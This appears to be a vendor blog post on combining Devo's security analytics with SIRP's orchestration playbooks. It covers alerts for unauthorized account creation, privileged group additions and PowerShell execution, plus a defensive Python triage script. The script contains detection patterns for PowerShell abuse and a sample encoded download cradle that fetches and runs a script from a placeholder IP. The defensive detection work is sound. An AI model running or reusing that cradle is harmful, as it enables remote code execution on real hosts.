When we ask what is most important for an organization to protect, the usual answer is its critical assets: the systems, applications, databases, and services that keep the business running. But are these assets important in themselves, or is there something else that makes them important? It is the business data and informational assets that are of paramount importance. After all, a database is merely a tool holding the data: your financial records have a different value from the SAP ERP system that holds them. Similarly, servers are hardware that processes or stores certain data. These informational assets are at the heart of every aspect of an organization. With advances in technology, coupled with cheaper storage, more data, and more diverse kinds of data, are being generated and stored every day than ever before, and more of it is analyzed in various ways to identify unique patterns.
In cybersecurity, organizations are using data analytics platforms to capture security and privacy data from multiple sources and then identify patterns in order to fight complex and targeted cyber attacks. The ability to collect data from a wide variety of sources, query historical data, and apply machine learning algorithms allows security analysts to hunt threats proactively.
If this proactive approach of collecting and correlating alert and event data is combined with security orchestration, automation and response, the result is:
Devo is a data analytics platform that unlocks the full value of machine data for the world's most instrumented enterprises. On the cybersecurity front, Devo helps organizations consolidate virtually any type of data required for end-to-end visibility, investigation, and reporting. Some of the useful sources from which Devo collects data are:
Devo customers can now use SIRP's security orchestration and automation capabilities together with Devo to get the best of both worlds. This integration allows analysts to use Devo to monitor and detect advanced threats and SIRP to automate their triage, response, and collaboration.
The cybersecurity landscape is constantly challenged by the ongoing development of advanced attack tactics and techniques. Attackers are making use of machine learning to evade defenses. And things are not slowing down, because continuous innovation in technology keeps opening up new sources of data that need to be stored, monitored, and evaluated. It is therefore not realistic to claim that an organization can prevent every threat. Security solutions work in silos, and an experienced security team is hard to build and even harder to retain.
Cybersecurity data analytics coupled with security orchestration, automation, and response addresses these challenges. Security teams can feed all their security data into Devo, define custom queries there, and send the resulting alerts to SIRP to automate the response. Analysts can use SIRP playbooks to automate artifact triage and response. These playbooks help analysts enrich their investigative data, perform threat hunting, gather threat intelligence, and execute remedial actions on endpoints.
Consider an example in which SIRP receives an alert from Devo about an unauthorized user creation, containing details of the action and the created username. Based on predefined rules, SIRP automatically executes a playbook. The playbook is set to perform the following actions:
The entire execution and decision flow of the playbook looks something like this:
The actual playbook in SIRP is shown below:
Let's take our example (Use Case 1) one step further. Consider an example in which SIRP receives an alert from Devo about an unauthorized user being added to a privileged security group in Microsoft Active Directory. Based on predefined rules, SIRP automatically executes a playbook. The playbook is set to perform the following actions:
The entire execution and decision flow of the playbook looks something like this:
The actual playbook in SIRP is shown below:
When an unauthorized PowerShell script is executed on an endpoint or a critical server, it is potentially malicious and needs to be detected and remediated immediately. As seen in the Petya/NotPetya campaigns, PowerShell is one of the most attractive built-in tools for attackers to abuse, because it enables fileless malware delivery within the target environment. Therefore, all PowerShell scripts executed on critical assets need real-time monitoring. Process launches, including powershell.exe, are recorded by Microsoft Windows machines as Event ID 4688 (process creation). Two caveats for practitioners: the command line is only present in 4688 events if command-line auditing ("Include command line in process creation events") is enabled in the audit policy, and the content of the script itself is only captured by PowerShell script block logging (Event ID 4104), so both should be enabled on critical assets and forwarded to the analytics platform.
Consider an example in which SIRP receives an alert from Devo about a PowerShell execution. Based on predefined rules, SIRP automatically executes a playbook. The playbook is set to perform the following actions:
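The three use cases on this page (unauthorized user creation, addition to a privileged AD group, and PowerShell execution on a critical asset) all start with the same step: a Windows Security event is matched against a rule and turned into an alert with the artifacts a playbook needs. The following is an added example of that triage step, written for this page and not code from SIRP or Devo. It runs over constructed sample events with the field names of the real Windows events (4720 user created; 4728/4732/4756 member added to a security-enabled global/local/universal group; 4688 process creation), uses a hypothetical allowlist policy in place of a CMDB lookup, and for 4688 also decodes a `-EncodedCommand` payload so the indicator scan sees the real script, which the raw command line alone would hide.

```python
"""Triage Windows Security events into SOAR-ready alerts (added example, constructed data)."""
import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Hypothetical policy a playbook would normally pull from IAM / the CMDB.
POLICY = {
    "authorized_admins": {"adm-alice", "adm-bob"},
    "privileged_groups": {"Domain Admins", "Enterprise Admins", "Administrators", "Schema Admins"},
    "critical_assets": {"DC01", "FS01"},
}

# Abuse indicators in a PowerShell command line (case-insensitive). powershell.exe accepts
# unambiguous prefixes of parameter names, hence the alternations.
PS_INDICATORS = {
    "encoded_command":   r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s",
    "hidden_window":     r"(?:^|\s)-(?:w|win|windowstyle)\s+hidden\b",
    "no_profile":        r"(?:^|\s)-(?:nop|noprofile)\b",
    "policy_bypass":     r"(?:^|\s)-(?:ep|ex|exec|executionpolicy)\s+bypass\b",
    "invoke_expression": r"\b(?:iex|invoke-expression)\b",
    "download_cradle":   r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b",
}
ENC_PAYLOAD = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
PS_BINARIES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}


@dataclass
class Alert:
    use_case: str
    severity: str
    computer: str
    actor: str
    reason: str
    artifacts: dict = field(default_factory=dict)  # what the playbook would act on


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the -EncodedCommand payload decoded (base64 of UTF-16LE), or None."""
    m = ENC_PAYLOAD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed payload: still worth an alert, just without the decoded text


def triage(ev: dict, policy: dict = POLICY) -> Optional[Alert]:
    eid, actor, host = ev["EventID"], ev.get("SubjectUserName", "?"), ev.get("Computer", "?")
    # Use case 1: 4720 "A user account was created" by an actor outside the admin allowlist.
    if eid == 4720:
        if actor in policy["authorized_admins"]:
            return None
        return Alert("unauthorized_user_creation", "high", host, actor,
                     f"{actor} created account {ev['TargetUserName']}",
                     {"created_user": ev["TargetUserName"]})
    # Use case 2: 4728/4732/4756 "A member was added to a security-enabled group";
    # TargetUserName is the group, MemberName the member's DN. Only privileged groups matter.
    if eid in (4728, 4732, 4756):
        group = ev["TargetUserName"]
        if group not in policy["privileged_groups"]:
            return None
        sev = "medium" if actor in policy["authorized_admins"] else "critical"
        return Alert("privileged_group_addition", sev, host, actor,
                     f"{actor} added {ev['MemberName']} to {group}",
                     {"group": group, "member": ev["MemberName"]})
    # Use case 3: 4688 process creation (CommandLine is only present with command-line auditing).
    if eid == 4688:
        exe = ev["NewProcessName"].rsplit("\\", 1)[-1].lower()
        if exe not in PS_BINARIES:
            return None
        cmd = ev.get("CommandLine", "")
        decoded = decode_encoded_command(cmd)
        haystack = cmd + "\n" + (decoded or "")  # scan the decoded script too
        hits = [k for k, pat in PS_INDICATORS.items() if re.search(pat, haystack, re.I)]
        if not hits and host not in policy["critical_assets"]:
            return None
        sev = "high" if len(hits) >= 2 else "medium" if hits else "low"
        return Alert("powershell_execution", sev, host, actor,
                     f"{exe} on {host}: indicators {hits or 'none'}",
                     {"command_line": cmd, "decoded_command": decoded, "indicators": hits})
    return None


def run(events, policy=POLICY):
    return [a for a in (triage(e, policy) for e in events) if a]


# Constructed sample events, flattened the way a SIEM forwards them.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/s.ps1')".encode("utf-16-le")
).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 4720, "SubjectUserName": "jdoe", "TargetUserName": "svc_backup2", "Computer": "DC01"},
    {"EventID": 4720, "SubjectUserName": "adm-alice", "TargetUserName": "contractor7", "Computer": "DC01"},
    {"EventID": 4728, "SubjectUserName": "jdoe", "TargetUserName": "Domain Admins",
     "MemberName": "CN=svc_backup2,CN=Users,DC=corp,DC=example", "Computer": "DC01"},
    {"EventID": 4732, "SubjectUserName": "adm-alice", "TargetUserName": "Remote Desktop Users",
     "MemberName": "CN=contractor7,CN=Users,DC=corp,DC=example", "Computer": "FS01"},
    {"EventID": 4688, "SubjectUserName": "jdoe", "NewProcessName": _PS, "Computer": "WS07",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"EventID": 4688, "SubjectUserName": "adm-alice", "NewProcessName": _PS, "Computer": "FS01",
     "CommandLine": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"EventID": 4688, "SubjectUserName": "jdoe", "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "Computer": "WS07", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(alert.severity.upper(), alert.use_case, "-", alert.reason)
```

The severity on the 4688 path is the piece the playbook branches on: a plain `-File` launch on a critical server is only "low" (worth logging and enriching, not isolating), while an encoded, hidden-window download cradle scores "high" even on an ordinary workstation, and the decoded script lands in the artifacts so the analyst does not have to decode it by hand.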
The entire execution and decision flow of the playbook looks something like this:
The actual playbook in SIRP is shown below:
The key benefits that can be realized out of this integration are: